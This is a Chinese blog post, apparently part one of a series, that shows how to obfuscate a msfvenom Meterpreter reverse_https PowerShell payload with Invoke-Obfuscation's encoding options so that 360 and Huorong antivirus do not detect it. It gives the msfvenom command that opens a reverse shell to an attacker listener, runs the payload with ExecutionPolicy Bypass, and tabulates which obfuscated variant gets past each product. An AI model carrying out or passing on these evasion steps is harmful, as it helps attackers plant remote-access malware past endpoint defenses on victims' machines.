Invoke-Obfuscation混淆免杀过360和火绒(上)

简介: Invoke-Obfuscation混淆免杀过360和火绒

Invoke-Obfuscation下载地址:


https://github.com/danielbohannon/Invoke-Obfuscation

Invoke-Obfuscation是一款混淆工具,具体信息可自行百度学习。

参考文档


https://blog.csdn.net/weixin_44216796/article/details/112723993

先说下结果:

Invoke-ObfuscationEncoding部分方法混淆可以过360和火绒,但是过不了Windows Defender


1. 模块使用


导入模块


Import-Module C:\0_poweshell\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1


这里注意,一定要写上完整路径,不然会报错


加载模块


Invoke-Obfuscation


支持的加密方法:


  • TOKEN支持分部分混淆
  • STRING整条命令混淆
  • COMPRESS将命令转为单行并压缩,
  • ENCODING编码
  • LAUNCHER选择执行方式

本文只讨论ENCODING编码方法


2. msfvenom下msf上线


首先用msfvenom生成一个ps1文件


msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=4444 -f psh-reflection > msf-crow.ps1



然后设置监听:


然后回到win10


2.1 360


直接在有360的环境下进行执行(这里不做云查杀和杀毒的操作)

PowerShell.exe -ExecutionPolicy Bypass -File .\msf-crow.ps1


上线成功。

这里来一次查杀,首先使用按位置查杀




报毒,直接在这个位置关闭,不处理



再运行一次,此时360提示有毒



2.2 Windows defender


复制到Windows sever2019下,Windows Defender直接杀掉,很干脆



2.3 火绒


关掉Windows Defender

直接使用火绒扫描,没扫描到


上线试试:



直接就上线了!!!


2.4 总结


因此在此可以进行如下总结:

msfvenom最新版(2021-05-28安装)生成powershell攻击脚本在静态下的查杀效果:



火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

✔️

未测

ps:以上环境都在联网状态下

同样

msfvenom最新版(2021-05-28安装)生成powershell攻击脚本在动态执行上线的查杀效果:



火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

✔️

未测

ps:以上环境都联网,且均在cmd中执行-ExecutionPolicy Bypass来绕过执行安全策略进行上线。


这里可以看到,360在第一次并不拦截,而且还可以上线,这可能由于我用的是虚拟机,如果是实体机的话,应该会被杀


3. 混淆大法


设置需要混淆的木马文件路径


set scriptpath C:\0_poweshell\msf-crow.ps1




4. 第一种混淆 1


encoding

选择第一种方法混淆

1

将文件输出的out 1.ps1


文件路径:


C:\0_poweshell\Invoke-Obfuscation-master\1.ps1

攻击机开启监听模式:

上线测试:


4.1 360


360环境下直接运行(生成之后没有杀毒扫描


PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\1.ps1

这里是在cmd命令行下执行PowerShell命令的

-ExecutionPolicy Bypass:绕过执行安全策略,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全保护规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。



(参考:https://blog.csdn.net/Eastmount/article/details/115503946)



360下上线成功



但使用360云查杀之后显示报毒


4.2 windows Defender


windows Defender 直接静态被杀



4.3 火绒


火绒,静态扫描报毒



动态上线失败



4.4 总结


静态查杀


火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

全挂。。。


5. 第2种混淆 2



这里先静态测试下


5.1 火绒


火绒直接报毒





5.2   360

360云查杀,正常




5.3 Windows Defender


正常


静态查杀能力:


火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

未测

✔️


动态上线能力:



PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\2.ps1

火绒:


静态查杀,动态上线失败



windf:

静态查杀正常动态上线失败



360:

动态上线失败,而且清除了木马,因此这里360也是静动均查杀了木马


此时对其进行重新调整如下表


5.4 总结


静态查杀能力:


火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

✔️

动态上线



火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

相关文章
|
6月前
|
移动开发 安全 数据安全/隐私保护
iOS代码混淆和加固技术详解
iOS代码混淆和加固技术详解
87 0
|
开发工具 C语言 数据安全/隐私保护
免杀工具 -- FourEye
免杀工具 -- FourEye
820 0
免杀工具 -- FourEye
|
网络协议 网络安全
Powershell免杀(无文件落地免杀)
无文件落地 顾名思义,无需将恶意文件传到目标服务器/机器上,直接利用powershell的特性加载到内存执行。为了在红队行动中更隐蔽的实施攻击以及横向移动,同时还可以解决目标不出网只能通过dns上线时的棘手问题,利用powershell可以避免一行行echo。 通过两种方式进行无文件落地的免杀,一种是出网的情况,另一种为不出网情况。 声明: 文章内容仅供网络安全爱好者学习使用,请勿用文章中提到的技术或工具做违法的事情,否则后果自负。
1135 0
|
30天前
|
XML 存储 安全
C#开发的程序如何良好的防止反编译被破解?ConfuserEx .NET混淆工具使用介绍
C#开发的程序如何良好的防止反编译被破解?ConfuserEx .NET混淆工具使用介绍
44 0
|
安全 程序员 Shell
反编译之脱去乐固加固的壳
反编译之脱去乐固加固的壳
|
Windows
Invoke-Obfuscation混淆免杀过360和火绒(下)
Invoke-Obfuscation混淆免杀过360和火绒
149 0
|
安全 Go API
自写go加载器加壳免杀——过国内主流杀软
自写go加载器加壳免杀——过国内主流杀软
444 0
|
安全 Windows
【工具分享】免杀360&火绒的shellcode加载器
【工具分享】免杀360&火绒的shellcode加载器
378 0
|
前端开发 rax C语言
脱壳学习(二)- 反“反调试”篇
脱壳学习(二)- 反“反调试”篇